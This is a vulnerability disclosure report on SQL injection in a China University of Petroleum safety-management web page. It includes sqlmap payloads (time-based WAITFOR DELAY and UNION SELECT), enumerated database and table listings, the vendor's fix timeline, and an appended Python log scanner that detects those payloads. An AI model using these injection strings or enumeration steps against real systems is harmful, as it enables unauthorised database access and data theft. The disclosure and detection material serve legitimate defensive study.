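2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and relevant domain experts
2015-12-09: Vendor fixed the vulnerability and proactively disclosed it; details released to the public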
RT
http://safety.upc.edu.cn/ China University of Petroleum (East China), Assets and Equipment Office, Technical Safety Management Information System
GET /info/Inspect/View.aspx?bh=yITcTAYL HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://safety.upc.edu.cn
Host: safety.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The bh parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: bh (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: bh=yITcTAYL';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: bh=yITcTAYL' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(105)+CHAR(102)+CHAR(80)+CHAR(74)+CHAR(112)+CHAR(77)+CHAR(74)+CHAR(105)+CHAR(106)+CHAR(90)+CHAR(104)+CHAR(81)+CHAR(109)+CHAR(110)+CHAR(73)+CHAR(105)+CHAR(81)+CHAR(100)+CHAR(105)+CHAR(68)+CHAR(100)+CHAR(69)+CHAR(86)+CHAR(85)+CHAR(113)+CHAR(114)+CHAR(99)+CHAR(88)+CHAR(76)+CHAR(76)+CHAR(84)+CHAR(68)+CHAR(104)+CHAR(74)+CHAR(73)+CHAR(103)+CHAR(67)+CHAR(108)+CHAR(117)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [19]:
[*] 123
[*] 321
[*] Ddjl
[*] gdjc
[*] iplist
[*] kaoqin
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ribaobiao
[*] scjd
[*] siteserver
[*] slzy
[*] tempdb
[*] TradeUnion
[*] UPCTECSAFDB
[*] wsc
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: UPCTECSAFDB
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dbo.WXHXPXXB        | 3777    |
| dbo.sysconstraints  | 600     |
| dbo.TLFBB           | 323     |
| dbo.DWXXB           | 261     |
| dbo.sydxdwbm        | 257     |
| dbo.TZSB_JYB        | 248     |
| dbo.AQWHB           | 246     |
| dbo.JBDMB           | 168     |
| dbo.YHZQXB          | 123     |
| dbo.QXJBXXB         | 102     |
| dbo.TZSB_JBXXB      | 97      |
| dbo.TZSBZCDJB       | 96      |
| dbo.DMLBB           | 53      |
| dbo.MBXXB           | 43      |
| dbo.GLJYB           | 37      |
| dbo.QPJHXXB         | 29      |
| dbo.YQLJB           | 28      |
| dbo.QZJJSCSB        | 27      |
| lijun.D99_Tmp       | 26      |
| dbo.TWSJBXXB        | 24      |
| dbo.TZSB_RYXXB      | 24      |
| dbo.TZSB_RYPXB      | 22      |
| dbo.YJFAB           | 17      |
| dbo.JDJCB           | 15      |
| dbo.GLDJKB          | 14      |
| dbo.GLDJK_JBXXB     | 9       |
| dbo.JDJCHZFJB       | 9       |
| dbo.TZSB_RYFLB      | 8       |
| dbo.YHDYZB          | 6       |
| dbo.AQWHLBB         | 5       |
| dbo.SXZZJBXXB       | 5       |
| dbo.YLRQJYB         | 5       |
| dbo.YQLJLBB         | 5       |
| dbo.GLBGB           | 4       |
| dbo.QXLBB           | 4       |
| dbo.TLFGLBB         | 4       |
| dbo.TWSSXZZ_SCHTFJB | 4       |
| dbo.AQWHFJB         | 3       |
| dbo.CNJCJSCSB       | 3       |
| dbo.syssegments     | 3       |
| dbo.YHXXB           | 3       |
| dbo.YHZB            | 3       |
| dbo.YJJYZJB         | 3       |
| dbo.TWSSXZZ_SCHTB   | 2       |
| dbo.DTJSCSB         | 1       |
| dbo.lulu            | 1       |
| dbo.YLRQDJK_JBXXB   | 1       |
| dbo.YLRQDJK_JBXXB   | 1       |
+---------------------+---------+
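Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-23 15:12
Thank you for your attention to the network security of China University of Petroleum. We will resolve this issue as soon as possible.
2015-12-09: The website has been shut down. Thank you for your attention to network information security at China University of Petroleum.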
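
The sqlmap payloads quoted in the report leave recognisable traces in IIS request logs. The following is an added example (not part of the original report or the vendor's code) that scans W3C-format log lines for requests to /info/Inspect/View.aspx whose bh value matches those payload shapes. The log lines, the field subset, the expected bh format and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the sqlmap payloads quoted in the report.
SIGNATURES = {
    "stacked-waitfor": re.compile(r";\s*WAITFOR\s+DELAY", re.I),
    "union-select": re.compile(r"UNION\s+ALL\s+SELECT", re.I),
    "char-concat": re.compile(r"CHAR\(\d+\)[\s+]*CHAR\(", re.I),
    "sql-comment": re.compile(r"--\s*$"),
}
# Assumption: legitimate bh values look like the one in the report (yITcTAYL).
EXPECTED_BH = re.compile(r"[A-Za-z0-9]{1,16}")

def parse_w3c(lines):
    """Yield one dict per request, using the #Fields: directive for column names."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split(" ")))

def inspect_bh(entry):
    """Return sorted signature names hit by the bh parameter, or [] if clean."""
    hits = set()
    for pair in entry.get("cs-uri-query", "-").split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() == "bh":
            value = unquote_plus(raw)  # decode %27, %3B, %2B ... before matching
            if not EXPECTED_BH.fullmatch(value):
                hits.add("unexpected-format")
            hits.update(n for n, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)

def scan(lines, path="/info/Inspect/View.aspx"):
    """Return (client IP, hits) for every suspicious request to the affected page."""
    return [(e.get("c-ip"), h) for e in parse_w3c(lines)
            if e.get("cs-uri-stem", "").lower() == path.lower()
            and (h := inspect_bh(e))]

# Constructed sample log (not real traffic); client addresses are documentation ranges.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-11-23 10:00:01 GET /info/Inspect/View.aspx bh=yITcTAYL 192.0.2.10 200
2015-11-23 10:00:05 GET /info/Inspect/View.aspx bh=yITcTAYL%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 198.51.100.7 200
2015-11-23 10:00:09 GET /info/Inspect/View.aspx bh=yITcTAYL%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR(113)%2BCHAR(118)%2CNULL--%20 198.51.100.7 200
""".splitlines()

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The allow-list check on the bh format catches payload variants that none of the named signatures cover, so it is the more durable of the two tests.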